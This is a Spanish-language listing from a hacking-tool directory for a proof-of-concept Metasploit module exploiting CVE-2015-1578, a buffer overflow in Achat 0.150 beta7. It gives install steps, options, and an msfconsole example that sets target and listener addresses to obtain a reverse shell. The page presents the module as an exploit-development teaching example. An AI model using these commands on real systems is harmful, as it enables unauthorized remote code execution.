Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2015-1578-PoC-Metasploit — Este es un exploit de módulo de Metasploit de prueba de concepto para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación conduce a la ejecución remota de código a través de un paquete UDP manipulado. | Kitploit
Herramientas/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
Frameworks de Pruebas de PenetraciónFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónShellcodeHerramienta de Acceso RemotoGeneración de ShellcodeDesarrollo de PayloadsExplotación de Binarios

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

Este es un exploit de módulo de Metasploit de prueba de concepto para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación conduce a la ejecución remota de código a través de un paquete UDP manipulado.

Ver Repositorio
hace 1 añoAún no revisado

Módulo de Metasploit para CVE-2015-1578

Descripción general

Este es un módulo de Metasploit para CVE-2015-1578, una vulnerabilidad de desbordamiento de búfer en Achat 0.150 beta7 en Windows. La explotación conduce a la ejecución remota de código a través de un paquete UDP manipulado.

Propósito

Este módulo está diseñado para servir como un ejemplo limpio, mínimo y bien estructurado de desarrollo de exploits para Metasploit. Demuestra:

  • Generación dinámica de shellcode con codificación Unicode mediante msfvenom
  • Inyección manual de payload (omitiendo el codificador interno de Metasploit)
  • Mecanismo de entrega simple basado en UDP
  • Integración en el marco de Metasploit mediante carga personalizada de módulos

Video tutorial

Video tutorial

Dependencias

  • Metasploit Framework
  • msfvenom en tu $PATH

Características

  • Usa msfvenom para generar payload con codificación x86/unicode_mixed y caracteres no permitidos personalizados
  • Evita el sistema de codificación de payload incorporado de Metasploit para sortear las limitaciones del codificador

Instalación

root@kitploit:~
./install.sh

Luego inicia Metasploit y ejecuta:

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

Opciones

  • RHOSTS – Dirección IP del objetivo (requerido)
  • LHOST – IP del host local para la shell inversa (requerido)
  • LPORT – Puerto local para la shell inversa (por defecto: 4444)
  • RPORT – Puerto UDP remoto en el objetivo (por defecto: 9256)

Ejemplo de uso

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

Esto hará lo siguiente:

  • Generar un payload de shell inversa compatible con Unicode mediante msfvenom
  • Inyectarlo en el búfer vulnerable de Achat a través de UDP
  • Escuchar la shell en el LHOST:LPORT especificado
Descargar herramienta